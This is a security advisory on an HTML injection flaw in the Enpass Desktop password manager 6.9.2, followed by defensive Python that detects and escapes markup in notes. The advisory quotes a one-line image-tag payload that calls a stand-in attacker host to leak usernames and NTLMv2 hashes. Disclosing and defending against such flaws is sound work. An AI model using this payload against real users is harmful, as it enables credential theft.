Enpass Desktop Application 6.9.2 HTML Injection

Enpass Desktop Application version 6.9.2 suffers from an HTML injection vulnerability.

Packet Storm
====================================================================
HTML Injection in Enpass Desktop Application (Version 6.9.2)

Product:       Enpass Password Manager
Version:       6.9.2
Issue date:    2024-02-11
Download:      https://www.enpass.io/beta/
Discovered by Muhammad Danial
====================================================================

*Overview:*

A vulnerability has been discovered in the Enpass Desktop application version 6.9.2 for Linux and Windows, which could potentially lead to HTML injection attacks. This vulnerability may be exploited by an attacker to execute malicious code and leak NTLMv2 hashes, compromising the security and privacy of affected users.

*Vulnerability Details:*

The vulnerability exists in the handling of notes within the Enpass Desktop application. By crafting a malicious note containing a specially crafted payload such as <img src="http://attacker_ip/?c=" />, an attacker can inject arbitrary HTML code into the note. When the victim opens the malicious note shared by the attacker, the HTML injection payload is executed, allowing the attacker to capture the victim's NTLMv2 hashes and username through their Enpass Desktop application.

*Impact:*

Successful exploitation of this vulnerability could result in the leakage of usernames and NTLMv2 hashes.
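The root cause described above is a note field whose content reaches an HTML-capable renderer unescaped. The following is an added example, not code from Enpass or from the advisory: it shows a check for notes that carry resource-loading markup and the escaping step that makes a note display as literal text. The function names and the sample notes are hypothetical and constructed for illustration; it assumes notes are meant to be plain text.

```python
import html
from html.parser import HTMLParser

# Attributes that make an HTML renderer fetch a resource when the note is shown.
# A plain-text note has no reason to carry any of them.
URL_ATTRS = {"src", "href", "srcset", "data", "poster", "background", "action"}


class _ResourceRefFinder(HTMLParser):
    """Collects (tag, attribute, value) for every resource-loading attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags such as <img ... />.
        for name, value in attrs:
            if name in URL_ATTRS and value and value.strip():
                self.findings.append((tag, name, value.strip()))


def find_resource_references(note_text):
    """Return markup in a note that would trigger a fetch if rendered as HTML."""
    finder = _ResourceRefFinder()
    finder.feed(note_text)
    finder.close()
    return finder.findings


def render_note_as_text(note_text):
    """Escape markup so the renderer displays the note literally."""
    return html.escape(note_text, quote=True)


# Constructed sample notes; the second is the payload quoted in the advisory.
SAMPLE_NOTES = {
    "benign": "Wi-Fi password rotated on 3 < 5 devices & laptops",
    "advisory_payload": 'hello <img src="http://attacker_ip/?c=" />',
    "uppercase_variant": '<IMG SRC="HTTP://attacker_ip/?c=">',
}

if __name__ == "__main__":
    for label, note in SAMPLE_NOTES.items():
        print(label, find_resource_references(note), render_note_as_text(note))
```

Escaping at render time is the fix; the finder is useful for auditing notes already stored or received through sharing.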
